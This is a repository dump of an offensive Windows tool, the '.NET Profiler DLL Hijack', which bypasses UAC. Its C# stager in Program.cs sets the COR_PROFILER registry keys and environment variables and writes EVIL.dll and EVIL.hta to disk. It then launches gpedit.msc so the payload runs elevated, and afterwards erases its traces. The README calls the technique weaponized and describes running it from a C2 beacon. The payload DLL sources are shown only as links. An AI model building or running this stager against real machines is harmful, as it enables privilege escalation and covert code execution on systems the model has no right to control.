├── .gitignore
├── DNH
    ├── Resources
    │   └── Payload.dll
    ├── DNH.sln
    ├── Properties
    │   ├── AssemblyInfo.cs
    │   ├── Resources.Designer.cs
    │   └── Resources.resx
    ├── DNH.csproj
    └── Program.cs
├── Payload
    ├── Payload
    │   ├── stdafx.h
    │   ├── Payload.cpp
    │   ├── dllmain.cpp
    │   ├── stdafx.cpp
    │   ├── targetver.h
    │   ├── Payload.vcxproj.user
    │   ├── Payload.vcxproj.filters
    │   └── Payload.vcxproj
    └── Payload.sln
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
1 | **/obj
2 | **/.vs
3 | **/bin
4 | **/Debug
5 | **/Release
6 | 


--------------------------------------------------------------------------------
/DNH/Resources/Payload.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/.NET-Profiler-DLL-Hijack/HEAD/DNH/Resources/Payload.dll


--------------------------------------------------------------------------------
/Payload/Payload/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/.NET-Profiler-DLL-Hijack/HEAD/Payload/Payload/stdafx.h


--------------------------------------------------------------------------------
/Payload/Payload/Payload.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/.NET-Profiler-DLL-Hijack/HEAD/Payload/Payload/Payload.cpp


--------------------------------------------------------------------------------
/Payload/Payload/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/.NET-Profiler-DLL-Hijack/HEAD/Payload/Payload/dllmain.cpp


--------------------------------------------------------------------------------
/Payload/Payload/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/.NET-Profiler-DLL-Hijack/HEAD/Payload/Payload/stdafx.cpp


--------------------------------------------------------------------------------
/Payload/Payload/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/.NET-Profiler-DLL-Hijack/HEAD/Payload/Payload/targetver.h


--------------------------------------------------------------------------------
/Payload/Payload/Payload.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/DNH/DNH.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.28010.2026
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DNH", "DNH.csproj", "{E49E2D53-BF38-45EE-AFAA-6D021B1BA832}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{E49E2D53-BF38-45EE-AFAA-6D021B1BA832}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{E49E2D53-BF38-45EE-AFAA-6D021B1BA832}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{E49E2D53-BF38-45EE-AFAA-6D021B1BA832}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{E49E2D53-BF38-45EE-AFAA-6D021B1BA832}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {F204EDF5-5EE0-49F7-837A-7D762D1BFD98}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/Payload/Payload/Payload.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClInclude Include="stdafx.h">
19 |       <Filter>Header Files</Filter>
20 |     </ClInclude>
21 |     <ClInclude Include="targetver.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClCompile Include="dllmain.cpp">
27 |       <Filter>Source Files</Filter>
28 |     </ClCompile>
29 |   </ItemGroup>
30 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # .NET Profiler DLL Hijack
 2 | 
 3 | ## Background
 4 | 
 5 | The .NET Framework can be coerced into loading a profiling DLL into any .NET assembly when launched. This is done when a handful of environment variables and registry keys are set. For a full write-up you can view this blog here: https://offsec.provadys.com/UAC-bypass-dotnet.html
 6 | 
 7 | ## Building and Using
 8 | 
 9 | The "Payload" project holds the main DLL to drop to disk. This DLL simply executes the specified command (but could be more). In the case of this project it starts mshta.exe pointing to an HTA file dropped to disk. If you want to change the command ran, you'll have to edit dllmain.cpp.
10 | 
11 | The "DNH" project is the staging executable. For this project, you should ADD two resources: the Payload.dll and the HTA file you wish to execute. The DNH project prepares the environment variables, writes the payload dll and evil hta to disk, then launches a process that uses the .NET framework. After it's been executed it cleans up the registry keys and environment variables set. You should see the HTA running with elevated rights. To change the staging process, edit Program.cs as required.
12 | 
13 | Your command doesn't have to involve any HTAs, it can be any arbitrary code. This was just the quickest way I found to weaponize it. Once DNH.exe is built, simply issue `execute-assembly` from beacon or otherwise to execute.
14 | 


--------------------------------------------------------------------------------
/Payload/Payload.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.28010.2026
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Payload", "Payload\Payload.vcxproj", "{B119ABD5-A00B-4662-A2F9-5674B26C312B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Debug|x64.Build.0 = Debug|x64
18 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Debug|x86.Build.0 = Debug|Win32
20 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Release|x64.ActiveCfg = Release|x64
21 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Release|x64.Build.0 = Release|x64
22 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Release|x86.ActiveCfg = Release|Win32
23 | 		{B119ABD5-A00B-4662-A2F9-5674B26C312B}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {F1E3DC98-60C6-4FFF-9620-D5475ED6FC6E}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/DNH/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("DNH")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DNH")]
13 | [assembly: AssemblyCopyright("Copyright ©  2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("e49e2d53-bf38-45ee-afaa-6d021b1ba832")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/DNH/DNH.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{E49E2D53-BF38-45EE-AFAA-6D021B1BA832}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>DNH</RootNamespace>
10 |     <AssemblyName>DNH</AssemblyName>
11 |     <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <Deterministic>true</Deterministic>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Core" />
37 |     <Reference Include="System.Xml.Linq" />
38 |     <Reference Include="System.Data.DataSetExtensions" />
39 |     <Reference Include="Microsoft.CSharp" />
40 |     <Reference Include="System.Data" />
41 |     <Reference Include="System.Xml" />
42 |   </ItemGroup>
43 |   <ItemGroup>
44 |     <Compile Include="Program.cs" />
45 |     <Compile Include="Properties\AssemblyInfo.cs" />
46 |     <Compile Include="Properties\Resources.Designer.cs">
47 |       <AutoGen>True</AutoGen>
48 |       <DesignTime>True</DesignTime>
49 |       <DependentUpon>Resources.resx</DependentUpon>
50 |     </Compile>
51 |   </ItemGroup>
52 |   <ItemGroup>
53 |     <EmbeddedResource Include="Properties\Resources.resx">
54 |       <Generator>ResXFileCodeGenerator</Generator>
55 |       <LastGenOutput>Resources.Designer.cs</LastGenOutput>
56 |     </EmbeddedResource>
57 |   </ItemGroup>
58 |   <ItemGroup>
59 |     <None Include="Resources\Payload.dll" />
60 |   </ItemGroup>
61 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
62 | </Project>


--------------------------------------------------------------------------------
/DNH/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
 1 | //------------------------------------------------------------------------------
 2 | // <auto-generated>
 3 | //     This code was generated by a tool.
 4 | //     Runtime Version:4.0.30319.42000
 5 | //
 6 | //     Changes to this file may cause incorrect behavior and will be lost if
 7 | //     the code is regenerated.
 8 | // </auto-generated>
 9 | //------------------------------------------------------------------------------
10 | 
11 | namespace DNH.Properties {
12 |     using System;
13 |     
14 |     
15 |     /// <summary>
16 |     ///   A strongly-typed resource class, for looking up localized strings, etc.
17 |     /// </summary>
18 |     // This class was auto-generated by the StronglyTypedResourceBuilder
19 |     // class via a tool like ResGen or Visual Studio.
20 |     // To add or remove a member, edit your .ResX file then rerun ResGen
21 |     // with the /str option, or rebuild your VS project.
22 |     [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
23 |     [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 |     [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 |     internal class Resources {
26 |         
27 |         private static global::System.Resources.ResourceManager resourceMan;
28 |         
29 |         private static global::System.Globalization.CultureInfo resourceCulture;
30 |         
31 |         [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 |         internal Resources() {
33 |         }
34 |         
35 |         /// <summary>
36 |         ///   Returns the cached ResourceManager instance used by this class.
37 |         /// </summary>
38 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 |         internal static global::System.Resources.ResourceManager ResourceManager {
40 |             get {
41 |                 if (object.ReferenceEquals(resourceMan, null)) {
42 |                     global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("DNH.Properties.Resources", typeof(Resources).Assembly);
43 |                     resourceMan = temp;
44 |                 }
45 |                 return resourceMan;
46 |             }
47 |         }
48 |         
49 |         /// <summary>
50 |         ///   Overrides the current thread's CurrentUICulture property for all
51 |         ///   resource lookups using this strongly typed resource class.
52 |         /// </summary>
53 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 |         internal static global::System.Globalization.CultureInfo Culture {
55 |             get {
56 |                 return resourceCulture;
57 |             }
58 |             set {
59 |                 resourceCulture = value;
60 |             }
61 |         }
62 |         
63 |         /// <summary>
64 |         ///   Looks up a localized resource of type System.Byte[].
65 |         /// </summary>
66 |         internal static byte[] Payload {
67 |             get {
68 |                 object obj = ResourceManager.GetObject("Payload", resourceCulture);
69 |                 return ((byte[])(obj));
70 |             }
71 |         }
72 |     }
73 | }
74 | 


--------------------------------------------------------------------------------
/DNH/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Linq;
 4 | using System.Text;
 5 | using Microsoft.Win32;
 6 | using System.IO;
 7 | using System.Diagnostics;
 8 | 
 9 | // Dot net hijack
10 | namespace DNH
11 | {
12 |     class Program
13 |     {
14 |         static void Main(string[] args)
15 |         {
16 |             string dummyGuid = "{" + System.Guid.NewGuid() + "}";
17 |             string dllPath = Environment.GetEnvironmentVariable("TEMP") + "\\EVIL.dll";
18 |             string evilPath = "C:\\Users\\Public\\EVIL.hta";
19 |             Console.WriteLine(dllPath);
20 |             string clsPath = "Software\\Classes\\CLSID\\";
21 |             string regPath = clsPath + dummyGuid;
22 |             Console.WriteLine("Creating registry keys in HKCU:{0}", regPath);
23 |             RegistryKey key = Registry.CurrentUser.CreateSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree);
24 |             key.SetValue("InprocServer32", dllPath);
25 |             RegistryKey env = Registry.CurrentUser.CreateSubKey("Environment", RegistryKeyPermissionCheck.ReadWriteSubTree);
26 |             env.SetValue("COR_ENABLE_PROFILING", "1");
27 |             env.SetValue("COR_PROFILER", dummyGuid);
28 |             env.SetValue("COR_PROFILER_PATH", dllPath);
29 |             Environment.SetEnvironmentVariable("COR_ENABLE_PROFILING", "1", EnvironmentVariableTarget.User);
30 |             Environment.SetEnvironmentVariable("COR_PROFILER", dummyGuid, EnvironmentVariableTarget.User);
31 |             Environment.SetEnvironmentVariable("COR_PROFILER_PATH", dllPath, EnvironmentVariableTarget.User);
32 |             // Skipping over set item
33 |             Console.WriteLine("Writing dll to file system...");
34 |             File.WriteAllBytes(dllPath, Properties.Resources.Payload);
35 |             Console.WriteLine("Writing EVIL.hta to C:\\Users\\Public\\EVIL.hta.");
36 |             // Add your embedded hta here. This is just staging logic for your dll cmd to execute
37 |             // successfully.
38 |             File.WriteAllText(evilPath, Properties.Resources.EVILHTA);
39 |             Process.Start("C:\\Windows\\System32\\gpedit.msc");
40 |             Console.WriteLine("Launched gpedit.msc. Sleeping 5...");
41 |             System.Threading.Thread.Sleep(5000);
42 |             Console.WriteLine("Beginning cleanup.");
43 | 
44 |             // Delete associated files.
45 |             File.Delete(evilPath);
46 |             File.Delete(dllPath);
47 |             Console.WriteLine("Deleted {0} and {1}", evilPath, dllPath);
48 | 
49 |             // Delete our fake GUID
50 |             RegistryKey clsid = Registry.CurrentUser.CreateSubKey(clsPath, RegistryKeyPermissionCheck.ReadWriteSubTree);
51 |             clsid.DeleteSubKeyTree(dummyGuid);
52 |             Console.WriteLine("Deleted HKCU:\\{0}", regPath);
53 | 
54 |             // Delete the COR variables from the Environment registry.
55 |             env.DeleteValue("COR_ENABLE_PROFILING", false);
56 |             env.DeleteValue("COR_PROFILER", false);
57 |             env.DeleteValue("COR_PROFILER_PATH", false);
58 |             Console.WriteLine("Deleted environment registry COR keys.");
59 | 
60 |             // Reset the environment variables.
61 |             Environment.SetEnvironmentVariable("COR_ENABLE_PROFILING", null, EnvironmentVariableTarget.User);
62 |             Environment.SetEnvironmentVariable("COR_PROFILER", null, EnvironmentVariableTarget.User);
63 |             Environment.SetEnvironmentVariable("COR_PROFILER_PATH", null, EnvironmentVariableTarget.User);
64 |             Console.WriteLine("Reset Environment variables.");
65 |             Console.WriteLine("All done!");
66 |         }
67 |     }       
68 | }
69 | 


--------------------------------------------------------------------------------
/DNH/Properties/Resources.resx:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <root>
  3 |   <!-- 
  4 |     Microsoft ResX Schema 
  5 |     
  6 |     Version 2.0
  7 |     
  8 |     The primary goals of this format is to allow a simple XML format 
  9 |     that is mostly human readable. The generation and parsing of the 
 10 |     various data types are done through the TypeConverter classes 
 11 |     associated with the data types.
 12 |     
 13 |     Example:
 14 |     
 15 |     ... ado.net/XML headers & schema ...
 16 |     <resheader name="resmimetype">text/microsoft-resx</resheader>
 17 |     <resheader name="version">2.0</resheader>
 18 |     <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
 19 |     <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
 20 |     <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
 21 |     <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
 22 |     <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
 23 |         <value>[base64 mime encoded serialized .NET Framework object]</value>
 24 |     </data>
 25 |     <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
 26 |         <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
 27 |         <comment>This is a comment</comment>
 28 |     </data>
 29 |                 
 30 |     There are any number of "resheader" rows that contain simple 
 31 |     name/value pairs.
 32 |     
 33 |     Each data row contains a name, and value. The row also contains a 
 34 |     type or mimetype. Type corresponds to a .NET class that support 
 35 |     text/value conversion through the TypeConverter architecture. 
 36 |     Classes that don't support this are serialized and stored with the 
 37 |     mimetype set.
 38 |     
 39 |     The mimetype is used for serialized objects, and tells the 
 40 |     ResXResourceReader how to depersist the object. This is currently not 
 41 |     extensible. For a given mimetype the value must be set accordingly:
 42 |     
 43 |     Note - application/x-microsoft.net.object.binary.base64 is the format 
 44 |     that the ResXResourceWriter will generate, however the reader can 
 45 |     read any of the formats listed below.
 46 |     
 47 |     mimetype: application/x-microsoft.net.object.binary.base64
 48 |     value   : The object must be serialized with 
 49 |             : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
 50 |             : and then encoded with base64 encoding.
 51 |     
 52 |     mimetype: application/x-microsoft.net.object.soap.base64
 53 |     value   : The object must be serialized with 
 54 |             : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
 55 |             : and then encoded with base64 encoding.
 56 | 
 57 |     mimetype: application/x-microsoft.net.object.bytearray.base64
 58 |     value   : The object must be serialized into a byte array 
 59 |             : using a System.ComponentModel.TypeConverter
 60 |             : and then encoded with base64 encoding.
 61 |     -->
 62 |   <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
 63 |     <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
 64 |     <xsd:element name="root" msdata:IsDataSet="true">
 65 |       <xsd:complexType>
 66 |         <xsd:choice maxOccurs="unbounded">
 67 |           <xsd:element name="metadata">
 68 |             <xsd:complexType>
 69 |               <xsd:sequence>
 70 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" />
 71 |               </xsd:sequence>
 72 |               <xsd:attribute name="name" use="required" type="xsd:string" />
 73 |               <xsd:attribute name="type" type="xsd:string" />
 74 |               <xsd:attribute name="mimetype" type="xsd:string" />
 75 |               <xsd:attribute ref="xml:space" />
 76 |             </xsd:complexType>
 77 |           </xsd:element>
 78 |           <xsd:element name="assembly">
 79 |             <xsd:complexType>
 80 |               <xsd:attribute name="alias" type="xsd:string" />
 81 |               <xsd:attribute name="name" type="xsd:string" />
 82 |             </xsd:complexType>
 83 |           </xsd:element>
 84 |           <xsd:element name="data">
 85 |             <xsd:complexType>
 86 |               <xsd:sequence>
 87 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
 88 |                 <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
 89 |               </xsd:sequence>
 90 |               <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
 91 |               <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
 92 |               <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
 93 |               <xsd:attribute ref="xml:space" />
 94 |             </xsd:complexType>
 95 |           </xsd:element>
 96 |           <xsd:element name="resheader">
 97 |             <xsd:complexType>
 98 |               <xsd:sequence>
 99 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
100 |               </xsd:sequence>
101 |               <xsd:attribute name="name" type="xsd:string" use="required" />
102 |             </xsd:complexType>
103 |           </xsd:element>
104 |         </xsd:choice>
105 |       </xsd:complexType>
106 |     </xsd:element>
107 |   </xsd:schema>
108 |   <resheader name="resmimetype">
109 |     <value>text/microsoft-resx</value>
110 |   </resheader>
111 |   <resheader name="version">
112 |     <value>2.0</value>
113 |   </resheader>
114 |   <resheader name="reader">
115 |     <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
116 |   </resheader>
117 |   <resheader name="writer">
118 |     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
119 |   </resheader>
120 |   <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
121 |   <data name="Payload" type="System.Resources.ResXFileRef, System.Windows.Forms">
122 |     <value>..\Resources\Payload.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
123 |   </data>
124 | </root>


--------------------------------------------------------------------------------
/Payload/Payload/Payload.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{B119ABD5-A00B-4662-A2F9-5674B26C312B}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>Payload</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.17134.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
